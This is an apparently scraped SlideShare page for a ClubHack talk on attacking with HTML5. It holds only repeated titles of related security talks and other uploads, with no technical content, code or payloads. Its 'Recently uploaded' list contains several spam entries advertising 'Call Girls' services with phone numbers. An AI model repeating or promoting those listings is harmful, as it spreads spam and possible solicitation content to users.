Attack with-html5
 
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1)
 
Html5 security
Html5 securityHtml5 security
Html5 security
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trends
 
[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best Practices
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012
 
Top 10 HTML5 Features for Oracle Cloud Developers
Top 10 HTML5 Features for Oracle Cloud DevelopersTop 10 HTML5 Features for Oracle Cloud Developers
Top 10 HTML5 Features for Oracle Cloud Developers
 
Peter lubbers-html5-offline-web-apps
Peter lubbers-html5-offline-web-appsPeter lubbers-html5-offline-web-apps
Peter lubbers-html5-offline-web-apps
 
Open source security
Open source securityOpen source security
Open source security
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
 
Silverlight vs HTML5 - Lessons learned from the real world...
Silverlight vs HTML5 - Lessons learned from the real world...Silverlight vs HTML5 - Lessons learned from the real world...
Silverlight vs HTML5 - Lessons learned from the real world...
 
HTML5 Offline Web Applications (Silicon Valley User Group)
HTML5 Offline Web Applications (Silicon Valley User Group)HTML5 Offline Web Applications (Silicon Valley User Group)
HTML5 Offline Web Applications (Silicon Valley User Group)
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
 
BeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-OrruBeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-Orru
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
 
orcreatehappyusers
orcreatehappyusersorcreatehappyusers
orcreatehappyusers
 

More from ClubHack

India legal 31 october 2014
India legal 31 october 2014India legal 31 october 2014
India legal 31 october 2014ClubHack
 
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ Bangalore
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ BangaloreCyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ Bangalore
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ BangaloreClubHack
 
Cyber Insurance
Cyber InsuranceCyber Insurance
Cyber InsuranceClubHack
 
Summarising Snowden and Snowden as internal threat
Summarising Snowden and Snowden as internal threatSummarising Snowden and Snowden as internal threat
Summarising Snowden and Snowden as internal threatClubHack
 
Fatcat Automatic Web SQL Injector by Sandeep Kamble
Fatcat Automatic Web SQL Injector by Sandeep KambleFatcat Automatic Web SQL Injector by Sandeep Kamble
Fatcat Automatic Web SQL Injector by Sandeep KambleClubHack
 
The Difference Between the Reality and Feeling of Security by Thomas Kurian
The Difference Between the Reality and Feeling of Security by Thomas KurianThe Difference Between the Reality and Feeling of Security by Thomas Kurian
The Difference Between the Reality and Feeling of Security by Thomas KurianClubHack
 
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...ClubHack
 
Smart Grid Security by Falgun Rathod
Smart Grid Security by Falgun RathodSmart Grid Security by Falgun Rathod
Smart Grid Security by Falgun RathodClubHack
 
Legal Nuances to the Cloud by Ritambhara Agrawal
Legal Nuances to the Cloud by Ritambhara AgrawalLegal Nuances to the Cloud by Ritambhara Agrawal
Legal Nuances to the Cloud by Ritambhara AgrawalClubHack
 
Infrastructure Security by Sivamurthy Hiremath
Infrastructure Security by Sivamurthy HiremathInfrastructure Security by Sivamurthy Hiremath
Infrastructure Security by Sivamurthy HiremathClubHack
 
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanHybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanClubHack
 
Hacking and Securing iOS Applications by Satish Bomisstty
Hacking and Securing iOS Applications by Satish BomissttyHacking and Securing iOS Applications by Satish Bomisstty
Hacking and Securing iOS Applications by Satish BomissttyClubHack
 
Critical Infrastructure Security by Subodh Belgi
Critical Infrastructure Security by Subodh BelgiCritical Infrastructure Security by Subodh Belgi
Critical Infrastructure Security by Subodh BelgiClubHack
 
Content Type Attack Dark Hole in the Secure Environment by Raman Gupta
Content Type Attack Dark Hole in the Secure Environment by Raman GuptaContent Type Attack Dark Hole in the Secure Environment by Raman Gupta
Content Type Attack Dark Hole in the Secure Environment by Raman GuptaClubHack
 
XSS Shell by Vandan Joshi
XSS Shell by Vandan JoshiXSS Shell by Vandan Joshi
XSS Shell by Vandan JoshiClubHack
 
Clubhack Magazine Issue February 2012
Clubhack Magazine Issue  February 2012Clubhack Magazine Issue  February 2012
Clubhack Magazine Issue February 2012ClubHack
 
ClubHack Magazine issue 26 March 2012
ClubHack Magazine issue 26 March 2012ClubHack Magazine issue 26 March 2012
ClubHack Magazine issue 26 March 2012ClubHack
 
ClubHack Magazine issue April 2012
ClubHack Magazine issue April 2012ClubHack Magazine issue April 2012
ClubHack Magazine issue April 2012ClubHack
 
ClubHack Magazine Issue May 2012
ClubHack Magazine Issue May 2012ClubHack Magazine Issue May 2012
ClubHack Magazine Issue May 2012ClubHack
 
ClubHack Magazine – December 2011
ClubHack Magazine – December 2011ClubHack Magazine – December 2011
ClubHack Magazine – December 2011ClubHack
 

More from ClubHack (20)

India legal 31 october 2014
India legal 31 october 2014India legal 31 october 2014
India legal 31 october 2014
 
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ Bangalore
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ BangaloreCyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ Bangalore
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ Bangalore
 
Cyber Insurance
Cyber InsuranceCyber Insurance
Cyber Insurance
 
Summarising Snowden and Snowden as internal threat
Summarising Snowden and Snowden as internal threatSummarising Snowden and Snowden as internal threat
Summarising Snowden and Snowden as internal threat
 
Fatcat Automatic Web SQL Injector by Sandeep Kamble
Fatcat Automatic Web SQL Injector by Sandeep KambleFatcat Automatic Web SQL Injector by Sandeep Kamble
Fatcat Automatic Web SQL Injector by Sandeep Kamble
 
The Difference Between the Reality and Feeling of Security by Thomas Kurian
The Difference Between the Reality and Feeling of Security by Thomas KurianThe Difference Between the Reality and Feeling of Security by Thomas Kurian
The Difference Between the Reality and Feeling of Security by Thomas Kurian
 
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...
 
Smart Grid Security by Falgun Rathod
Smart Grid Security by Falgun RathodSmart Grid Security by Falgun Rathod
Smart Grid Security by Falgun Rathod
 
Legal Nuances to the Cloud by Ritambhara Agrawal
Legal Nuances to the Cloud by Ritambhara AgrawalLegal Nuances to the Cloud by Ritambhara Agrawal
Legal Nuances to the Cloud by Ritambhara Agrawal
 
Infrastructure Security by Sivamurthy Hiremath
Infrastructure Security by Sivamurthy HiremathInfrastructure Security by Sivamurthy Hiremath
Infrastructure Security by Sivamurthy Hiremath
 
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanHybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
 
Hacking and Securing iOS Applications by Satish Bomisstty
Hacking and Securing iOS Applications by Satish BomissttyHacking and Securing iOS Applications by Satish Bomisstty
Hacking and Securing iOS Applications by Satish Bomisstty
 
Critical Infrastructure Security by Subodh Belgi
Critical Infrastructure Security by Subodh BelgiCritical Infrastructure Security by Subodh Belgi
Critical Infrastructure Security by Subodh Belgi
 
Content Type Attack Dark Hole in the Secure Environment by Raman Gupta
Content Type Attack Dark Hole in the Secure Environment by Raman GuptaContent Type Attack Dark Hole in the Secure Environment by Raman Gupta
Content Type Attack Dark Hole in the Secure Environment by Raman Gupta
 
XSS Shell by Vandan Joshi
XSS Shell by Vandan JoshiXSS Shell by Vandan Joshi
XSS Shell by Vandan Joshi
 
Clubhack Magazine Issue February 2012
Clubhack Magazine Issue  February 2012Clubhack Magazine Issue  February 2012
Clubhack Magazine Issue February 2012
 
ClubHack Magazine issue 26 March 2012
ClubHack Magazine issue 26 March 2012ClubHack Magazine issue 26 March 2012
ClubHack Magazine issue 26 March 2012
 
ClubHack Magazine issue April 2012
ClubHack Magazine issue April 2012ClubHack Magazine issue April 2012
ClubHack Magazine issue April 2012
 
ClubHack Magazine Issue May 2012
ClubHack Magazine Issue May 2012ClubHack Magazine Issue May 2012
ClubHack Magazine Issue May 2012
 
ClubHack Magazine – December 2011
ClubHack Magazine – December 2011ClubHack Magazine – December 2011
ClubHack Magazine – December 2011
 

Recently uploaded

08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 

Recently uploaded (20)

08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptx
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 

Attacking with html5(lava kumar)